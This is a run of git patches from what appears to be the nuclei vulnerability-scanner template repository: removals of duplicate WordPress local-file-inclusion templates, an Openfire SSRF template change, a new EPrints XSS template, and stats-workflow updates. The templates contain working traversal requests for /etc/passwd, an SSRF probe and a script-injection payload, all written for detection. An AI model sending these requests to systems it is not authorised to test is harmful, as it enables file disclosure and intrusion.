Mon, 19 Jul 2021 16:56:45 +0530 Subject: [PATCH 081/149] Removed duplicate template --- .../wordpress/wp-localize-post-lfi.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 vulnerabilities/wordpress/wp-localize-post-lfi.yaml diff --git a/vulnerabilities/wordpress/wp-localize-post-lfi.yaml b/vulnerabilities/wordpress/wp-localize-post-lfi.yaml deleted file mode 100644 index 625bbb737a..0000000000 --- a/vulnerabilities/wordpress/wp-localize-post-lfi.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-localize-post-lfi - -info: - name: WordPress Plugin Localize My Post 1.0 - Local File Inclusion - author: 0x240x23elu - severity: high - reference: https://www.exploit-db.com/exploits/45439 - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd" - - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - part: body \ No newline at end of file From f56bfd81bfa0f8ed123dd52633a118675948c0fd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 11:28:26 +0000 Subject: [PATCH 082/149] Auto Update README [Mon Jul 19 11:28:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b22a9d0c8b..34d4a2aac4 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 466 | vulnerabilities | 237 | exposed-panels | 201 | +| cves | 467 | vulnerabilities | 237 | exposed-panels | 202 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1604 files**. +**134 directories, 1606 files**. From 5833092a53cebf62a0a232a975b4627e0af74cd1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 11:29:52 +0000 Subject: [PATCH 083/149] Auto Update README [Mon Jul 19 11:29:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 34d4a2aac4..ce8b9da810 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 467 | vulnerabilities | 237 | exposed-panels | 202 | +| cves | 467 | vulnerabilities | 236 | exposed-panels | 202 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1606 files**. +**134 directories, 1605 files**. From 2d6198ba047fea3f4d9ff6543164f47fd184b8f5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 18:13:09 +0530 Subject: [PATCH 084/149] Updated payload + matcher --- cves/2019/CVE-2019-18394.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2019/CVE-2019-18394.yaml b/cves/2019/CVE-2019-18394.yaml index 5bd99f4581..853e3f08d8 100644 --- a/cves/2019/CVE-2019-18394.yaml +++ b/cves/2019/CVE-2019-18394.yaml @@ -8,13 +8,15 @@ info: refrense: | - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 - tags: cve,cve2019,ssrf + tags: cve,cve2019,ssrf,openfire,oob requests: - method: GET path: - - "{{BaseURL}}/getFavicon?host=burpcollaborator.net" + - "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}" + matchers: - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - -

Burp Collaborator Server

+ - "http" \ No newline at end of file From 96d7a23ccde9984f2c29d0679f6cd246da4117f8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 18:15:42 +0530 Subject: [PATCH 085/149] removed duplicate --- .../wordpress/wp-mail-masta-lfi.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 vulnerabilities/wordpress/wp-mail-masta-lfi.yaml diff --git a/vulnerabilities/wordpress/wp-mail-masta-lfi.yaml b/vulnerabilities/wordpress/wp-mail-masta-lfi.yaml deleted file mode 100644 index 7706b5236e..0000000000 --- a/vulnerabilities/wordpress/wp-mail-masta-lfi.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-mail-masta-lfi - -info: - name: WordPress Plugin Mail Masta 1.0 - Local File Inclusion - author: 0x240x23elu - severity: high - reference: https://www.exploit-db.com/exploits/40290 - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" - - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - part: body \ No newline at end of file From c22924c1ba5d67843bd3fe6eb1040d3e9478055b Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 18:17:12 +0530 Subject: [PATCH 086/149] misc updates --- cves/2016/CVE-2016-10956.yaml | 2 +- cves/2018/CVE-2018-16299.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index 4c48c18707..b59c24dc22 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -2,7 +2,7 @@ id: CVE-2016-10956 info: name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) - author: daffainfo + author: daffainfo,0x240x23elu severity: high description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956 diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml index 5741f9b96f..4e6d0331b4 100644 --- a/cves/2018/CVE-2018-16299.yaml +++ b/cves/2018/CVE-2018-16299.yaml @@ -2,7 +2,7 @@ id: CVE-2018-16299 info: name: WordPress Plugin Localize My Post 1.0 - LFI - author: 0x_Akoko + author: 0x_Akoko,0x240x23elu severity: high reference: https://www.exploit-db.com/exploits/45439 tags: wordpress,cve2018,cve,lfi From 7a99c2db48cb047d786bd9af44db6f9e5157a84d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 19 Jul 2021 19:47:31 +0700 Subject: [PATCH 087/149] Rename to CVE-2018-16283 --- .../2018/CVE-2018-16283.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename vulnerabilities/wordpress/wp-wechat-broadcast-lfi.yaml => cves/2018/CVE-2018-16283.yaml (83%) diff --git a/vulnerabilities/wordpress/wp-wechat-broadcast-lfi.yaml b/cves/2018/CVE-2018-16283.yaml similarity index 83% rename from vulnerabilities/wordpress/wp-wechat-broadcast-lfi.yaml rename to cves/2018/CVE-2018-16283.yaml index c4f8d1e2f5..3a4f4be80f 100644 --- a/vulnerabilities/wordpress/wp-wechat-broadcast-lfi.yaml +++ b/cves/2018/CVE-2018-16283.yaml @@ -1,11 +1,11 @@ -id: wp-wechat-broadcast-lfi +id: CVE-2018-16283 info: name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion author: 0x240x23elu severity: high reference: https://www.exploit-db.com/exploits/45438 - tags: wordpress,wp-plugin,lfi + tags: cve,cve2018,wordpress,wp-plugin,lfi requests: - method: GET @@ -16,4 +16,4 @@ requests: - type: regex regex: - "root:[x*]:0:0:" - part: body \ No newline at end of file + part: body From b44b0d2a42690e42c48caa02b565e93a0a270967 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 12:48:24 +0000 Subject: [PATCH 088/149] Auto Update README [Mon Jul 19 12:48:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ce8b9da810..4c8d48b7ab 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 467 | vulnerabilities | 236 | exposed-panels | 202 | +| cves | 467 | vulnerabilities | 235 | exposed-panels | 202 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1605 files**. +**134 directories, 1604 files**. From ffce401c2328429a0d9f22cb7274ef0f17101ae3 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 19 Jul 2021 18:22:19 +0530 Subject: [PATCH 089/149] Update CVE-2018-16283.yaml --- cves/2018/CVE-2018-16283.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml index 3a4f4be80f..72d62b3cdf 100644 --- a/cves/2018/CVE-2018-16283.yaml +++ b/cves/2018/CVE-2018-16283.yaml @@ -3,8 +3,10 @@ id: CVE-2018-16283 info: name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion author: 0x240x23elu - severity: high - reference: https://www.exploit-db.com/exploits/45438 + severity: critical + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 + - https://www.exploit-db.com/exploits/45438 tags: cve,cve2018,wordpress,wp-plugin,lfi requests: From bd48ea76cb40633c13ee1eb725eab7d7808434c8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 12:53:32 +0000 Subject: [PATCH 090/149] Auto Update README [Mon Jul 19 12:53:32 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 4c8d48b7ab..bfb7b06b0d 100644 --- a/README.md +++ b/README.md @@ -38,7 +38,7 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 467 | vulnerabilities | 235 | exposed-panels | 202 | +| cves | 468 | vulnerabilities | 234 | exposed-panels | 202 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | From 39acc90454651d051e9c5a8d17859b1e1401038a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 19 Jul 2021 08:34:21 -0500 Subject: [PATCH 091/149] Create CVE-2021-26475.yaml CVE-2021-26475 -- EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI. --- cves/2021/CVE-2021-26475.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2021/CVE-2021-26475.yaml diff --git a/cves/2021/CVE-2021-26475.yaml b/cves/2021/CVE-2021-26475.yaml new file mode 100644 index 0000000000..bc9d4332f5 --- /dev/null +++ b/cves/2021/CVE-2021-26475.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-26475 + +info: + name: EPrints 3.4.2 XSS + author: geeknik + description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI. + reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf + severity: medium + tags: cve,cve2021,xss,eprints + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + - type: word + part: header + words: + - "text/html" From 4fd805743f76d944ac64298cddf8d4e347ac286c Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 19:28:18 +0530 Subject: [PATCH 092/149] Added template stats automation --- .github/workflows/templates-stats.yml | 57 +++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 .github/workflows/templates-stats.yml diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml new file mode 100644 index 0000000000..76979791ea --- /dev/null +++ b/.github/workflows/templates-stats.yml @@ -0,0 +1,57 @@ +name: Templates Stats + +on: + create: + tags: + - v* + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + steps: + - name: Checkout Repo + uses: actions/checkout@master + + - name: Setup golang + uses: actions/setup-go@v2 + with: + go-version: 1.14 + + - name: Cache Go + id: cache-go + uses: actions/cache@v2 + with: + path: /home/runner/go + key: ${{ runner.os }}-go + + - name: Installing Template Stats + if: steps.cache-go.outputs.cache-hit != 'true' + env: + GO111MODULE: on + run: | + go get -v github.com/projectdiscovery/templates-stats + shell: bash + + - name: Markdown Stats + run: | + templates-stats -output TEMPLATES-STATS.md -path . + shell: bash + + - name: JSON Stats + run: | + templates-stats -output TEMPLATES-STATS.json -json -path . + shell: bash + + - name: Commit files + run: | + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a + + - name: Push changes + if: steps.update-readme.outputs.changes > 0 + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + branch: ${{ github.ref }} \ No newline at end of file From 05a088ff64af9344d4296cadd4fba8d7ffd0c028 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 19:28:59 +0530 Subject: [PATCH 093/149] Stats updates on tag release --- .github/workflows/update-readme.yml | 3 --- 1 file changed, 3 deletions(-) diff --git a/.github/workflows/update-readme.yml b/.github/workflows/update-readme.yml index dccc5d3db2..f837ccfd4d 100644 --- a/.github/workflows/update-readme.yml +++ b/.github/workflows/update-readme.yml @@ -1,9 +1,6 @@ name: 📝 Readme Update on: - push: - branches: - - master create: tags: - v* From b409ff4f30478e78da7c01274ac7c0c1e5e7b1c4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 19:30:28 +0530 Subject: [PATCH 094/149] Update templates-stats.yml --- .github/workflows/templates-stats.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 76979791ea..c93b9a2cf0 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -26,7 +26,6 @@ jobs: key: ${{ runner.os }}-go - name: Installing Template Stats - if: steps.cache-go.outputs.cache-hit != 'true' env: GO111MODULE: on run: | From 319e3f0ad78b61ac25ffc3017789afde634f55e3 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 19 Jul 2021 19:35:26 +0530 Subject: [PATCH 095/149] Update templates-stats.yml --- .github/workflows/templates-stats.yml | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index c93b9a2cf0..b627beb344 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -18,13 +18,6 @@ jobs: with: go-version: 1.14 - - name: Cache Go - id: cache-go - uses: actions/cache@v2 - with: - path: /home/runner/go - key: ${{ runner.os }}-go - - name: Installing Template Stats env: GO111MODULE: on @@ -53,4 +46,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} - branch: ${{ github.ref }} \ No newline at end of file + branch: ${{ github.ref }} From ac5046270de249713122db178dfeff292d8655c8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 19:39:22 +0530 Subject: [PATCH 096/149] minor update --- .github/workflows/templates-stats.yml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index b627beb344..c0a0472631 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -18,6 +18,13 @@ jobs: with: go-version: 1.14 + - name: Cache Go + id: cache-go + uses: actions/cache@v2 + with: + path: /home/runner/go + key: ${{ runner.os }}-go + - name: Installing Template Stats env: GO111MODULE: on @@ -37,6 +44,8 @@ jobs: - name: Commit files run: | + git add TEMPLATES-STATS.md + git add TEMPLATES-STATS.json git config --local user.email "action@github.com" git config --local user.name "GitHub Action" git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a From e82c972a5e0305da116fff0f70b211695ccdc4f0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 19:40:54 +0530 Subject: [PATCH 097/149] minor update --- .github/workflows/templates-stats.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index c0a0472631..214cf997e7 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -51,7 +51,6 @@ jobs: git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a - name: Push changes - if: steps.update-readme.outputs.changes > 0 uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} From 2f59da0308468dfe70d7a457735769682a11227b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 14:11:31 +0000 Subject: [PATCH 098/149] Auto Generated Templates Stats [Mon Jul 19 14:11:31 UTC 2021] :robot: --- TEMPLATES-STATS.json | 1 + TEMPLATES-STATS.md | 602 +++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 603 insertions(+) create mode 100644 TEMPLATES-STATS.json create mode 100644 TEMPLATES-STATS.md diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json new file mode 100644 index 0000000000..5f49fff958 --- /dev/null +++ b/TEMPLATES-STATS.json @@ -0,0 +1 @@ +{"tags":[{"name":"cve","count":462},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":166},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":111},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"takeover","count":71},{"name":"cve2021","count":70},{"name":"token","count":63},{"name":"cve2018","count":61},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"network","count":32},{"name":"iot","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"logs","count":24},{"name":"oob","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"misconfig","count":13},{"name":"debug","count":13},{"name":"cve2015","count":13},{"name":"struts","count":13},{"name":"weblogic","count":12},{"name":"fuzz","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":11},{"name":"springboot","count":11},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"cve2011","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"dlink","count":9},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"cve2013","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"aws","count":8},{"name":"gitlab","count":8},{"name":"ftp","count":8},{"name":"php","count":8},{"name":"adobe","count":8},{"name":"cve2014","count":7},{"name":"vmware","count":7},{"name":"scada","count":7},{"name":"joomla","count":7},{"name":"nginx","count":6},{"name":"rails","count":6},{"name":"google","count":6},{"name":"cms","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"api","count":6},{"name":"xxe","count":6},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"solr","count":5},{"name":"ruijie","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"ssti","count":5},{"name":"laravel","count":5},{"name":"confluence","count":5},{"name":"java","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"phpmyadmin","count":5},{"name":"jetty","count":5},{"name":"drupal","count":5},{"name":"ibm","count":4},{"name":"solarwinds","count":4},{"name":"django","count":4},{"name":"moodle","count":4},{"name":"thinkcmf","count":4},{"name":"cve2009","count":4},{"name":"magmi","count":4},{"name":"nodejs","count":4},{"name":"docker","count":4},{"name":"vpn","count":4},{"name":"elastic","count":4},{"name":"router","count":4},{"name":"hongdian","count":4},{"name":"netgear","count":4},{"name":"traversal","count":4},{"name":"jolokia","count":4},{"name":"thinkphp","count":4},{"name":"tomcat","count":4},{"name":"artifactory","count":4},{"name":"asp","count":4},{"name":"samsung","count":4},{"name":"fileupload","count":4},{"name":"webserver","count":4},{"name":"kafka","count":3},{"name":"crlf","count":3},{"name":"grafana","count":3},{"name":"fpd","count":3},{"name":"oa","count":3},{"name":"ofbiz","count":3},{"name":"r-seenet","count":3},{"name":"springcloud","count":3},{"name":"log","count":3},{"name":"ebs","count":3},{"name":"vbulletin","count":3},{"name":"caucho","count":3},{"name":"deserialization","count":3},{"name":"microstrategy","count":3},{"name":"git","count":3},{"name":"backups","count":3},{"name":"bypass","count":3},{"name":"kubernetes","count":3},{"name":"terramaster","count":3},{"name":"slack","count":3},{"name":"amazon","count":3},{"name":"resin","count":3},{"name":"lfr","count":3},{"name":"windows","count":3},{"name":"mongodb","count":3},{"name":"ssh","count":3},{"name":"nacos","count":3},{"name":"fanruan","count":3},{"name":"dedecms","count":3},{"name":"openssh","count":3},{"name":"printer","count":3},{"name":"nosqli","count":3},{"name":"odoo","count":2},{"name":"hpe","count":2},{"name":"prometheus","count":2},{"name":"glassfish","count":2},{"name":"jellyfin","count":2},{"name":"smtp","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"service","count":2},{"name":"kibana","count":2},{"name":"ecology","count":2},{"name":"cve2008","count":2},{"name":"sonicwall","count":2},{"name":"vrealize","count":2},{"name":"couchdb","count":2},{"name":"injection","count":2},{"name":"smb","count":2},{"name":"exposures","count":2},{"name":"plesk","count":2},{"name":"jboss","count":2},{"name":"strapi","count":2},{"name":"mail","count":2},{"name":"trixbox","count":2},{"name":"mida","count":2},{"name":"zabbix","count":2},{"name":"xxljob","count":2},{"name":"waf","count":2},{"name":"pega","count":2},{"name":"hashicorp","count":2},{"name":"keycloak","count":2},{"name":"natshell","count":2},{"name":"maian","count":2},{"name":"emerge","count":2},{"name":"bigip","count":2},{"name":"yapi","count":2},{"name":"sonarqube","count":2},{"name":"bitrix","count":2},{"name":"nextjs","count":2},{"name":"idrac","count":2},{"name":"spark","count":2},{"name":"rockethchat","count":2},{"name":"shellshock","count":2},{"name":"frp","count":2},{"name":"chamilo","count":2},{"name":"nexus","count":2},{"name":"voipmonitor","count":2},{"name":"httpd","count":2},{"name":"flir","count":2},{"name":"rstudio","count":2},{"name":"activemq","count":2},{"name":"sharepoint","count":2},{"name":"ucmdb","count":2},{"name":"coldfusion","count":2},{"name":"huawei","count":2},{"name":"dos","count":2},{"name":"wordfence","count":2},{"name":"rockmongo","count":2},{"name":"splunk","count":2},{"name":"microsoft","count":2},{"name":"cache","count":2},{"name":"openam","count":2},{"name":"kentico","count":2},{"name":"zhiyuan","count":2},{"name":"globalprotect","count":2},{"name":"leak","count":2},{"name":"hjtcloud","count":2},{"name":"openfire","count":2},{"name":"saltstack","count":2},{"name":"seeyon","count":2},{"name":"hp","count":2},{"name":"proxy","count":2},{"name":"fortios","count":2},{"name":"paloalto","count":2},{"name":"showdoc","count":2},{"name":"intrusive","count":2},{"name":"telerik","count":2},{"name":"webcam","count":2},{"name":"icewarp","count":2},{"name":"bash","count":1},{"name":"hadoop","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"mongo","count":1},{"name":"landrayoa","count":1},{"name":"monitorix","count":1},{"name":"webui","count":1},{"name":"darkstat","count":1},{"name":"rdp","count":1},{"name":"wildfly","count":1},{"name":"zenario","count":1},{"name":"triconsole","count":1},{"name":"jmx","count":1},{"name":"wso2","count":1},{"name":"lotuscms","count":1},{"name":"klog","count":1},{"name":"embedthis","count":1},{"name":"linkedin","count":1},{"name":"faraday","count":1},{"name":"dvwa","count":1},{"name":"mcafee","count":1},{"name":"druid","count":1},{"name":"smartsense","count":1},{"name":"zeroshell","count":1},{"name":"openrestry","count":1},{"name":"rsyncd","count":1},{"name":"alibaba","count":1},{"name":"fastcgi","count":1},{"name":"zookeeper","count":1},{"name":"optiLink","count":1},{"name":"calendarix","count":1},{"name":"netis","count":1},{"name":"rhymix","count":1},{"name":"panabit","count":1},{"name":"livezilla","count":1},{"name":"nuxeo","count":1},{"name":"targa","count":1},{"name":"ems","count":1},{"name":"bullwark","count":1},{"name":"mediumish","count":1},{"name":"firebase","count":1},{"name":"mantisbt","count":1},{"name":"opensns","count":1},{"name":"netdata","count":1},{"name":"kubeflow","count":1},{"name":"nedi","count":1},{"name":"node","count":1},{"name":"fiori","count":1},{"name":"blind","count":1},{"name":"spectracom","count":1},{"name":"aura","count":1},{"name":"svnserve","count":1},{"name":"crm","count":1},{"name":"primetek","count":1},{"name":"lanproxy","count":1},{"name":"svn","count":1},{"name":"ioncube","count":1},{"name":"esmtp","count":1},{"name":"yii","count":1},{"name":"sitecore","count":1},{"name":"sqlite","count":1},{"name":"vscode","count":1},{"name":"cocoon","count":1},{"name":"rubedo","count":1},{"name":"htmli","count":1},{"name":"jnoj","count":1},{"name":"phpunit","count":1},{"name":"rmc","count":1},{"name":"etouch","count":1},{"name":"nexusdb","count":1},{"name":"totaljs","count":1},{"name":"gitlist","count":1},{"name":"wamp","count":1},{"name":"jquery","count":1},{"name":"mailchimp","count":1},{"name":"phpinfo","count":1},{"name":"wp-theme","count":1},{"name":"fedora","count":1},{"name":"grav","count":1},{"name":"krweb","count":1},{"name":"timesheet","count":1},{"name":"plc","count":1},{"name":"varnish","count":1},{"name":"harbor","count":1},{"name":"turbocrm","count":1},{"name":"bolt","count":1},{"name":"discord","count":1},{"name":"geddy","count":1},{"name":"memcached","count":1},{"name":"hasura","count":1},{"name":"eyou","count":1},{"name":"npm","count":1},{"name":"axis","count":1},{"name":"fortiweb","count":1},{"name":"uwsgi","count":1},{"name":"interlib","count":1},{"name":"openstack","count":1},{"name":"sprintful","count":1},{"name":"jsf","count":1},{"name":"szhe","count":1},{"name":"bookstack","count":1},{"name":"goahead","count":1},{"name":"geutebruck","count":1},{"name":"episerver","count":1},{"name":"ntopng","count":1},{"name":"stem","count":1},{"name":"woocomernce","count":1},{"name":"wmt","count":1},{"name":"synnefo","count":1},{"name":"hortonworks","count":1},{"name":"jfrog","count":1},{"name":"ilo4","count":1},{"name":"ecom","count":1},{"name":"ec2","count":1},{"name":"huijietong","count":1},{"name":"yachtcontrol","count":1},{"name":"traefik","count":1},{"name":"tika","count":1},{"name":"zarafa","count":1},{"name":"email","count":1},{"name":"maccmsv10","count":1},{"name":"enum","count":1},{"name":"tapestry","count":1},{"name":"opencast","count":1},{"name":"trilithic","count":1},{"name":"idemia","count":1},{"name":"kerbynet","count":1},{"name":"alertmanager","count":1},{"name":"node-red-dashboard","count":1},{"name":"wifisky","count":1},{"name":"nps","count":1},{"name":"sidekiq","count":1},{"name":"xdcms","count":1},{"name":"favicon","count":1},{"name":"ueditor","count":1},{"name":"spf","count":1},{"name":"shopware","count":1},{"name":"cgi","count":1},{"name":"comodo","count":1},{"name":"checkpoint","count":1},{"name":"nordex","count":1},{"name":"powercreator","count":1},{"name":"wazuh","count":1},{"name":"gateone","count":1},{"name":"flash","count":1},{"name":"zm","count":1},{"name":"acme","count":1},{"name":"grails","count":1},{"name":"beanshell","count":1},{"name":"clave","count":1},{"name":"plone","count":1},{"name":"clusterengine","count":1},{"name":"blue-ocean","count":1},{"name":"haproxy","count":1},{"name":"keenetic","count":1},{"name":"cors","count":1},{"name":"wooyun","count":1},{"name":"servicedesk","count":1},{"name":"lancom","count":1},{"name":"cse","count":1},{"name":"finereport","count":1},{"name":"sentry","count":1},{"name":"ricoh","count":1},{"name":"ruby","count":1},{"name":"gridx","count":1},{"name":"cve2005","count":1},{"name":"circontrorl","count":1},{"name":"viewlinc","count":1},{"name":"javascript","count":1},{"name":"codeigniter","count":1},{"name":"wuzhicms","count":1},{"name":"drone","count":1},{"name":"subrion","count":1},{"name":"oscommerce","count":1},{"name":"scs","count":1},{"name":"adminer","count":1},{"name":"enumeration","count":1},{"name":"xiuno","count":1},{"name":"st","count":1},{"name":"sco","count":1},{"name":"mobileiron","count":1},{"name":"csod","count":1},{"name":"socomec","count":1},{"name":"itop","count":1},{"name":"phalcon","count":1},{"name":"dlogin","count":1},{"name":"liferay","count":1},{"name":"rmi","count":1},{"name":"parentlink","count":1},{"name":"linksys","count":1},{"name":"horde","count":1},{"name":"gogs","count":1},{"name":"mautic","count":1},{"name":"ssltls","count":1},{"name":"flink","count":1},{"name":"starttls","count":1},{"name":"javamelody","count":1},{"name":"seacms","count":1},{"name":"salesforce","count":1},{"name":"dompdf","count":1},{"name":"clockwatch","count":1},{"name":"mirai","count":1},{"name":"zend","count":1},{"name":"zmanda","count":1},{"name":"wavemaker","count":1},{"name":"pulsesecure","count":1},{"name":"fastapi","count":1},{"name":"floc","count":1},{"name":"ambari","count":1},{"name":"dotnetnuke","count":1},{"name":"circontrol","count":1},{"name":"fortigate","count":1},{"name":"openerp","count":1}